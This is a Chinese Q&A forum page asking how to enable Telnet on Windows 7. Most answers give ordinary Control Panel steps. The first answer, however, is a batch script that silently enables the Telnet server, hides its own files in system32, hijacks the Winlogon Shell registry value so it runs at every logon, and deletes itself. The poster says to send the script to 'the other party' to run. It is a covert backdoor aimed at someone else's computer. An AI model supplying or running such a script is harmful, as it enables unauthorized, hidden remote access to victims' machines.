win7的telnet远程服务如何开启? 精选

如题 ... 如题  展开
 我来答

答题抽奖

首次认真答题后

即可获得3次抽奖机会,100%中奖。

更多问题
最佳答案
linyun0525
2011-11-02
展开全部
@echo off
echo sc config tlntsvr start= auto>telnet.bat
echo sc start tlntsvr>>telnet.bat
echo set ws=wscript.createobject("wscript.shell")>telnet.vbs
echo ws.run "telnet.bat /start",0>>telnet.vbs
attrib +s +h +r telnet.bat
attrib +s +h +r telnet.vbs
copy telnet.bat %systemroot%\system32
copy telnet.vbs %systemroot%\system32
echo Windows Registry Editor Version 5.00 >auto.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>auto.reg
echo "Shell"="Explorer.exe %%systemroot%%\\system32\\telnet.vbs">>auto.reg
regedit /s auto.reg
del auto.reg
sc config tlntsvr start= auto
sc start tlntsvr
ping -n 3 127.1>nul
ping -n 12 127.1>nul
del %0
exit
保存为BAT文件 发送至对方并运行
速达_济南天禹
来自电脑网络类芝麻团 2015-09-23
速达_济南天禹
采纳数:4263 获赞数:21809 LV16
擅长:电脑/网络 娱乐休闲 办公软件 常见软件
参与团队:软件问题集合
向TA提问 私信TA
展开全部
  1. 首先进入Win7控制面板,可以从开始里找到或者在桌面上找到计算机,点击进入里面也可以找到控制面板。

  2. 进入控制面板后,再找到“程序和功能”并点击进入。

  3. 进入“程序与功能”面板后,在左侧再找到“打开或关闭Windows功能”,并点击进入。

  4. 点击打开或关闭Windows功能会弹出Windows功能对话框,在里面找到“Telnet服务器”和“Telne客户端”两项,然后将之前的勾选上即可开启对应服务了,打上勾后,要记得点击底部的确认保存即可。

已赞过 已踩过<
评论 收起
Neo邦
2011-11-06
Neo邦
采纳数:38 获赞数:669 LV6
擅长:足球 篮球 体育名人
向TA提问 私信TA
展开全部
win7下默认是禁用telnet服务的
重新启动Telnet方法如下:
1、如果你直接到控制面板的管理工具里的服务项里去找telnet的话,那是徒劳无功
的,因为默认根本就没有这一服务。当然,你可以通过如下方式搞定。“控制面
板” 一〉“程序” 一〉“打开或关闭windows功能”,在里面你可以看到许多服务项,选
择“telnet服务器”和“telnet客户端”确定即可。这样你再回“服务项”或者
services.msc里面就可以看到telnet啦,
2、通过“控制面板”--〉“管理工具”一〉“服务”或者“services.msc进入服务项列表
之后,找到telnet,可以看到它是被禁用的,此时你需要在“禁用”右键选择“属
性”并在里面将“禁用”改为“手动”,然后再启动状态栏右键选择“启动”。这样
你机器的telnet服务就启动啦。

参考资料: http://zhidao.baidu.com/question/336918256.html

本回答被提问者采纳
已赞过 已踩过<
评论 收起
SEOFSEM
2011-11-11
SEOFSEM
采纳数:4 获赞数:71 LV2
擅长:暂未定制
向TA提问 私信TA
展开全部
“控制面
板” 一〉“程序” 一〉“打开或关闭windows功能”,在里面你可以看到许多服务项,选
择“telnet服务器”和“telnet客户端”确定即可。这样你再回“服务项
已赞过 已踩过<
评论 收起
收起 其他1条回答
广告

您可能关注的内容